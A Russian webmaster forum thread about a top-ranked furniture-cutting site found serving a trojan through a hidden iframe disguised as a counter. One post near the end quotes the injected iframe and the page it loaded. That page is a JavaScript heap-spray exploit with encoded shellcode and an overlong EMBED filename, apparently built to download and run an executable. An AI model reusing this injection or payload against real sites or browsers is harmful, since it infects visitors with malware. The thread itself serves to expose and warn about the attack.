- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Не знал куда эту тему поместить.
В общем слежу за одним запросом и вот в ТОП 1 вырвался сайт.
Решил на него зайти посмотреть и офигел.
Сайт тематичный, тут всё ок, но если зайти на сайт тут же получаешь трояна.
Конечно файрвол и антивир сделали своё дело. Троян причмокнул в сторонке, даже не грузанулся, но блиин ... толи это случайность и тот, кто делал сайт заражен, либо это спецом заражение. Либо что.
Вот такая ситуация. Если интересно, могу запрос и сайт кинуть в личку.
А хостеру написать про сайт с вирусом слабО ?
Не исключено, что давно хакнули, сами продвинули в ТОП всеми доступными методами, и после внедрили туда троян.
Тематика сайта какая? ;_)
Тематика Распил ДСП ... в общем НЧ запросы. Сайт сейчас 1-й в выдаче.
Кстати судя по сайту, делал его человек не особенно профессиональный. Короче наскоро сляпаный с 5-7 страницами. Вон как в темах "сделаю сайт за 5 у.е".
Кому интересно, вот этот сайтик
http:/ / w w w .d i z m e b e l. r u
но сразу предупреждаю, если нет антивира, лучше не соваться.
mymind, да мы с Вами конкуренты :) ? (Этот сайт не мой, мой пониже будет немного)
Проверил его DrWeb-online, все чисто вроде. Кстати, рекомендую всем http://online.drweb.com/?url=1 . Пару раз ловил вирусы по ссылкам с форума, теперь только после проверки.
Да, там сверху невидимый фрейм. Сломали сайтик. Но причем тут яндекс?:)
Да, там сверху невидимый фрейм. Сломали сайтик.
Именно. Вставка под видом counter'а а грузит тебе троян. Я уже покопался интересная штуковина. Работает и под FireFox, что ооччень интересно.
Но причем тут яндекс?
Яша, как раз и не приделах. Речь не о том, а о том, что человек попадающий в топ выдачи и тыкающий на первый сайт может реально получить трояна. Вот этот случай я и описал. Может немного не так выразился. ;)
mymind, да мы с Вами конкуренты ? (Этот сайт не мой, мой пониже будет немного)
Ну как конкуренты. Не совсем. Человек, который вплотную занимается его продвижение сейчас не может этим заниматься. В итоге мне пришлось за ним приглядывать. Мой тоже чуть чуть пониже. :D
На странице кроме этого ничего не вижу:
<iframe width=1 height=1 border=0 frameborder=0 src="http://steklo-vrn.ru/exp/index.php"></iframe>
А было:
<HTML><HEAD><SCRIPT>var s=unescape("䅁䅁䅁䅁䅁䅁䅁䅁");do{s+=s;}while(s.length<0x0900000);s+=unescape("哫疋謼㕴͸囵皋̠㏵䧉굁�༶ᒾ㠨瓲섈෋�㯯痟廧庋̤曝ಋ譋ᱞ�ҋ΋쏅牵浬湯搮汬䌀尺⹕硥e쀳ͤ぀౸䂋謌ᱰ训ࡀ৫䂋贴籀䂋锼躿๎ト茄␬\闐뽐ᨶ瀯濨诿⑔跼멒�卓匤탿뽝ﺘຊ叨菿Ӭⲃ戤탿线`rᅲ瑨灴⼺漯畢歬挮浯振畯瑮牥是汩⹥硥e");</SCRIPT></HEAD><BODY><EMBED SRC="----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></EMBED></BODY></HTML> L>Отдавалось примерно таким же iframe.
Лезть на этот сайт больше не собираюсь.
Лезть на этот сайт больше не собираюсь.
Пользуйтесь правильно настроеными альтернативными браузерами и ничего не бойтесь))